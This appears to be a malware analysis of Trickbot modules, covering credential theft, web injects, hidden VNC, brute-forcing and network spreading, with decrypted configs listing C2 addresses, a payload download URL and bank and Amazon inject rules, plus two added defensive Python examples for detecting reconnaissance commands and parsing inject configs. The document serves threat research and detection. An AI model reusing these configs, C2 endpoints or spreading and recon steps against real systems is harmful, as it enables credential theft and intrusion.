Trickbot DLL Module downloaded + decrypted

anubisDll32

This is a man-in-the-browser module. It contains a full implementation of the IcedID main module. It can intercept web traffic on the victim machine. This module also contains embedded binary Anubis VNC (also known as HDESK Bot), which is a custom RAT based on the VNC (Virtual Network Computing) protocol that’s used by IcedID for remote control.

bcClientDll32

This is a reverse proxy module with a custom implementation of the SOCKS5 protocol. It is used to relay traffic through the compromised host.

bvncDll32

This module is an implementation of Hidden VNC, a custom remote administration tool based on the VNC (Virtual Network Computing) protocol. Hidden means that this variant of VNC creates an additional desktop that is not visible to the user, so attackers can operate the compromised system much as they would over an RDP connection without attracting the user’s attention. Web sessions and passwords saved in the browser are available within hVNC sessions: an attacker can freely run a web browser on the remote system and access any web service for which the user has an active session.

cookiesDll32

The module steals cookie data from web browsers. It targets the storage databases of Chrome, Firefox, Internet Explorer and Microsoft Edge.

domainDll32

The module is also called DomainGrabber. It collects domain controller information on compromised systems by accessing the SYSVOL folder. The first version of this module queried for the groups.xml, services.xml, scheduledtasks.xml, datasources.xml, printers.xml and drives.xml files. The current version only queries for group policies (groups.xml).

tdpwgrab32

This is a password-stealing module. It can steal credentials stored in the registry, in the databases of various applications, in configuration files and in “precious files”, i.e., private keys, SSL certificates and crypto wallet data files. It is also able to grab autofill information from web browsers. The module is capable of stealing data from the following applications: Git, TeamViewer, OpenSSH, OpenVPN, KeePass, Outlook, FileZilla, Internet Explorer, Mozilla Firefox, Google Chrome, Microsoft Edge, RDP, WinSCP, VNC, UltraVNC, RealVNC, TigerVNC, PuTTY, AnyConnect. Note that newer module versions may also target other applications.

fscanDll32

This is an FTP (File Transfer Protocol) and SFTP (SSH File Transfer Protocol) file scanner based on the open-source software project cURL. The module receives a list of rules for matching files and FTP/SSH resources, enumerates the files on the targeted resource and reports back to the C2.

importDll32

This module steals data from web browsers, including browser configuration, cookies, history, page titles, visit counts and HTML5 local storage. The browsers Internet Explorer, Mozilla Firefox, Google Chrome and Microsoft Edge are targeted. The module also gathers information about installed browser plugins and components.

injectDll32

This module is used to intercept activity related to banking websites in browsers. It uses web injects to steal financial information. Two types of attack are supported: “static” and “dynamic”. Static attacks redirect user requests to a malicious phishing page, while dynamic attacks pass all traffic through the malicious proxy server, making it possible to grab information from input forms and modify banking website responses by injecting additional malicious scripts in returned pages.

mailsearcher32

This module enumerates all disks and folders, and searches for email patterns in files. It ignores files with selected extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico. In addition, it unpacks files with .xlsx, .docx and .zip extensions, and performs the same email pattern search on the extracted files. Every time the scan of a disk completes, the module sends the list of addresses found back to the C2 server.

masrvDll32

This module is a network scanner based on the source code of the Masscan project. The module requests a range of IP addresses from the C2, scans every IP in that range for the specified open port, and sends the list of addresses and ports found back to the C2 server.

mlcDll32

This module implements the main functionality of the Gophe spambot. The Gophe spambot was used to propagate Dyre malware. As the successor to Dyre, it comes as no surprise that Trickbot has also inherited Gophe’s source code. It can grab emails from Outlook and send spam through Outlook using MAPI. It also removes traces of spamming by deleting emails from the Outlook Sent Items folder. This module is also propagated by Trickbot as a standalone executable known as TrickBooster.

networkDll32

This module gets information about the network from the local system. It uses the following ADSI (Active Directory Service Interfaces) property methods to gather information:

ComputerName; SiteName; DomainShortName; DomainDNSName; ForestDNSName; DomainController.

It retrieves the DNS names of all the directory trees in the local computer’s forest. It also gets a full process list and a system information snapshot (OS Architecture / ProductType / Version / Build / InstallationDate / LastBootUpTime / SerialNumber / User / Organization / TotalPhysicalMemory).

The module executes and gathers the results of selected commands:

“ipconfig /all”
“net config workstation”
“net view /all”
“net view /all /domain”
“nltest /domain_trusts”
“nltest /domain_trusts /all_trusts”
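The six commands above, run back to back from one parent process, are a recognisable host-reconnaissance burst. The following detection logic is an added example (not part of the original page or Trickbot itself) that scans constructed process-creation events in a hypothetical `timestamp ppid=N cmd=...` line format and flags any parent that runs several distinct commands from this set within a short window:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# The recon commands the page lists for networkDll32, normalised to lower case / single spaces.
RECON_COMMANDS = {
    "ipconfig /all", "net config workstation", "net view /all",
    "net view /all /domain", "nltest /domain_trusts", "nltest /domain_trusts /all_trusts",
}

# Constructed process-creation events (not real telemetry): timestamp, parent PID, command line.
# PID 4120 runs the whole set within seconds; PID 9001 runs two commands an hour apart.
SAMPLE_EVENTS = """\
2023-01-01T10:00:01 ppid=4120 cmd=cmd.exe /c ipconfig /all
2023-01-01T10:00:02 ppid=4120 cmd=cmd.exe /c net config workstation
2023-01-01T10:00:02 ppid=4120 cmd=cmd.exe /c net view /all
2023-01-01T10:00:03 ppid=4120 cmd=cmd.exe /c net view /all /domain
2023-01-01T10:00:03 ppid=4120 cmd=cmd.exe /c nltest /domain_trusts
2023-01-01T10:00:04 ppid=4120 cmd=cmd.exe /c nltest /domain_trusts /all_trusts
2023-01-01T10:05:00 ppid=9001 cmd=cmd.exe /c ipconfig /all
2023-01-01T11:05:00 ppid=9001 cmd=cmd.exe /c net view /all
2023-01-01T11:06:00 ppid=9001 cmd=notepad.exe report.txt
"""
EVENT_RE = re.compile(r"^(\S+) ppid=(\d+) cmd=(.*)$")

def recon_command(cmdline: str):
    """Return the recon command a process command line ends with, or None."""
    norm = " ".join(cmdline.lower().split())
    for cmd in RECON_COMMANDS:
        if norm == cmd or norm.endswith(" " + cmd):
            return cmd
    return None

def find_recon_bursts(log: str, window=timedelta(seconds=60), min_distinct=4) -> dict:
    """Map parent PID -> set of distinct recon commands, for parents that ran at least
    min_distinct different ones inside one window (the whole set at once is the Trickbot pattern)."""
    by_parent = defaultdict(list)
    for line in log.splitlines():
        m = EVENT_RE.match(line)
        cmd = recon_command(m.group(3)) if m else None
        if cmd:
            by_parent[int(m.group(2))].append((datetime.fromisoformat(m.group(1)), cmd))
    alerts = {}
    for ppid, events in by_parent.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            seen = {c for t, c in events[i:] if t - start <= window}
            if len(seen) >= min_distinct:
                alerts[ppid] = seen
                break
    return alerts
```

Administrators do run these commands individually, so the window and the distinct-command threshold are what keep the rule from firing on routine troubleshooting.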

NewBCtestnDll32

This module is a reverse proxy module with a custom implementation of the SOCKS5 protocol. It is used to relay traffic through the compromised host. The module can determine the external network IP address via the STUN protocol, using Google’s STUN servers. It can also create new processes from a command line received from a proxy-C2. It cannot download binaries for execution, but the ability to create new processes by starting powershell.exe with a Base64-encoded script on the command line effectively turns this module into a backdoor. Note that this is a common tactic for many actors.

outlookDll32

This module is written in Delphi, which is uncommon. The module tries to retrieve credentials from the Outlook profile stored in the system registry.

owaDll32

This module receives a list of domains, logins and passwords from the C2, and tries to find an OWA service on selected domains. To do so, it creates a URL by adding subdomains (‘webmail.’, ‘mail.’, ‘outlook.’) to domains from the list, and setting the URL path to ‘/owa’. After that it makes a POST request to the crafted URL, and checks the response for strings, tags or headers that are specific to an OWA service. The module then reports back to the C2 about the OWA URLs it finds. It can also perform a brute-force attack on the OWA URLs with logins and passwords received from the C2.

psfin32

Using Active Directory Service Interfaces (ADSI), this module makes Lightweight Directory Access Protocol (LDAP) and Global Catalog (GC) queries for organizational unit names, site names, group account names, personal account names and computer host names, using the masks ‘POS’, ‘REG’, ‘CASH’, ‘LANE’, ‘STORE’, ‘RETAIL’, ‘BOH’, ‘ALOHA’, ‘MICROS’ and ‘TERM’.

rdpscanDll32

This module receives a list of domains, IPs, logins and passwords from the C2, checks each target for an RDP connection, and reports back to the C2 on the online status of the targets. It can perform brute-force attacks on targeted systems using the received logins and passwords. It also has the ability to brute-force credentials by mutating IPs, domain names and logins, for instance by replacing, swapping or removing letters, numbers and dots, switching from lower to upper case or vice versa, performing string inversion, etc.

shadDll32

This is the first implementation of the anubisDll32 module. It does not include the Anubis VNC embedded binary.

shareDll32

This module is used to spread Trickbot over the network. It downloads Trickbot from the URL http[:]//172[.]245.6.107/images/control.png and saves it as tempodile21.rec. It then enumerates network resources and tries to copy the downloaded Trickbot to the C$ or ADMIN$ share as nats21.exe. It then creates and starts a remote service on the compromised system using one of the following paths:

%SystemDrive%\nats21.exe
%SystemRoot%\system32\nats21.exe

The following service names are used to hide the presence of nats21.exe:

SystemServiceHnet
HnetSystemService
Techno

    Conf

    \NewBCtestDll64_configs
    <servers>
    <addr>162.209.124.166:80</addr>
    <addr>167.99.206.127:80</addr>
    <addr>199.247.24.9:80</addr>
    </servers>

    \pwgrab64_configs
    <dpost>
    </dpost>

    \injectDll64_configs
    <dpost>
    </dpost>

    \mailsearcher64_configs
    <mail>
    <handler>185.198.57.70:443</handler>
    </mail>

    \psfin64_configs
    <dpost>
    </dpost>

    \networkDll64_configs
    <dpost>
    </dpost>


    webinject

    <igroup>
    <dinj>
    <lm>*.com/SPF/Login/Auth.aspx*</lm>
    <hl>http://185.202.174.13/response.php</hl>
    <pri>100</pri>
    <sq>2</sq>
    <ignore_mask>*.gif*</ignore_mask>
    <ignore_mask>*.jpg*</ignore_mask>
    <ignore_mask>*.png*</ignore_mask>
    <ignore_mask>*.js*</ignore_mask>
    <ignore_mask>*.css*</ignore_mask>
    <require_header>*text/html*</require_header>
    </dinj>
    <dinj>
    <lm>*.com/SPF/Login/favicon.ico?*</lm>
    <hl>http://185.202.174.13/response.php</hl>
    <pri>100</pri>
    <sq>2</sq>
    </dinj>
    <dinj>
    <lm>*favicon.ico=f7caf50483938302d86aa228d161e435*</lm>
    <hl>http://185.202.174.13/response.php</hl>
    <pri>100</pri>
    <sq>1</sq>
    </dinj>
    </igroup>
    <dinj>
    <lm>*amazon.*</lm>
    <hl>https://185.202.174.13:446/response.php?s=1527163537124692&id=DeJENQHkNQsIpSv5YWb8</hl>
    <pri>100</pri>
    <sq>2</sq>
    <ignore_mask>https://www.amazon.co.uk/ap/signin</ignore_mask>
    <ignore_mask>https://www.amazon.co.uk/*</ignore_mask>
    <ignore_mask>https://www.amazon.co.uk/gp/yourstore/home*</ignore_mask>
    <ignore_mask>https://sellercentral.amazon.com/ap/signin*</ignore_mask>
    <ignore_mask>https://sellercentral.amazon.com/gp/notifications/notification-widget-internals.html*</ignore_mask>
    <ignore_mask>*popokai.com*</ignore_mask>
    <ignore_mask>*.js*</ignore_mask>
    <ignore_mask>https://www.amazon.de/ap/signin</ignore_mask>
    <ignore_mask>https://www.amazon.ca/ap/signin</ignore_mask>
    <ignore_mask>https://www.amazon.de/gp/yourstore/home*</ignore_mask>
    <ignore_mask>https://www.amazon.ca/gp/yourstore/home*</ignore_mask>
    <ignore_mask>https://www.amazon.ca/*</ignore_mask>
    <ignore_mask>https://www.amazon.de/*</ignore_mask>
    <require_header>*text/html*</require_header>
    </dinj>
    <dinj>
    <lm>https://www.amazon.co.uk/ap/signin</lm>
    <hl>https://185.202.174.13:446/response.php?s=1527163537124692&id=sL5FRia9p0kAxzAm7uXQ</hl>
    <pri>100</pri>
    <sq>2</sq>
    <ignore_mask>*popokai.com*</ignore_mask>
    </dinj>
    ...
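Each `<dinj>` entry above pairs a URL mask (`<lm>`) with the handler (`<hl>`) the inject body is fetched from, plus exclusions (`<ignore_mask>`), a response-header filter (`<require_header>`) and a priority (`<pri>`). The parser and matcher below are an added example for triaging such a config (not Trickbot code and not from the original page); it works on a constructed two-entry sample with a placeholder handler host (203.0.113.10), assumes `*` is the only wildcard, and interprets `<require_header>` as a mask over the response Content-Type:

```python
import re
# Constructed sample in the <dinj> format of the webinject config shown above;
# the handler host 203.0.113.10 is a documentation placeholder, not a real C2.
SAMPLE_CONFIG = """
<dinj>
<lm>*amazon.*</lm>
<hl>https://203.0.113.10:446/response.php?s=1&id=AAAA</hl>
<pri>100</pri>
<ignore_mask>https://www.amazon.co.uk/ap/signin</ignore_mask>
<ignore_mask>*.js*</ignore_mask>
<require_header>*text/html*</require_header>
</dinj>
<dinj>
<lm>https://www.amazon.co.uk/ap/signin</lm>
<hl>https://203.0.113.10:446/response.php?s=1&id=BBBB</hl>
<pri>100</pri>
</dinj>
"""
# Regexes instead of an XML parser: the config is not well-formed XML (raw '&' inside <hl>).
DINJ_RE = re.compile(r"<dinj>(.*?)</dinj>", re.S)
TAG_RE = re.compile(r"<(\w+)>(.*?)</\1>", re.S)
LIST_TAGS = ("ignore_mask", "require_header")   # tags that may repeat inside one <dinj>

def parse_injects(text: str) -> list:
    """Return one dict per <dinj>: lm, hl, pri plus lists of ignore_mask / require_header."""
    injects = []
    for body in DINJ_RE.findall(text):
        entry = {tag: [] for tag in LIST_TAGS}
        for tag, value in TAG_RE.findall(body):
            if tag in LIST_TAGS:
                entry[tag].append(value.strip())
            else:
                entry[tag] = value.strip()
        entry["pri"] = int(entry.get("pri", 0))
        injects.append(entry)
    return injects

def mask_matches(mask: str, value: str) -> bool:
    # Assumption: '*' is the only wildcard; everything else is literal and case-insensitive.
    pattern = ".*".join(re.escape(part) for part in mask.split("*"))
    return re.fullmatch(pattern, value, re.I) is not None

def select_inject(injects: list, url: str, content_type: str):
    """Entry that fires for a response: URL matches <lm> and no <ignore_mask>, and the
    Content-Type satisfies every <require_header>; the highest <pri> wins, else None."""
    hits = [i for i in injects
            if mask_matches(i["lm"], url)
            and not any(mask_matches(m, url) for m in i["ignore_mask"])
            and all(mask_matches(h, content_type) for h in i["require_header"])]
    return max(hits, key=lambda i: i["pri"]) if hits else None
```

Running `select_inject` over a list of URLs an organisation's users actually visit is a quick way to see which of them a decrypted config would have tampered with, and the `<hl>` values give the handler hosts to block.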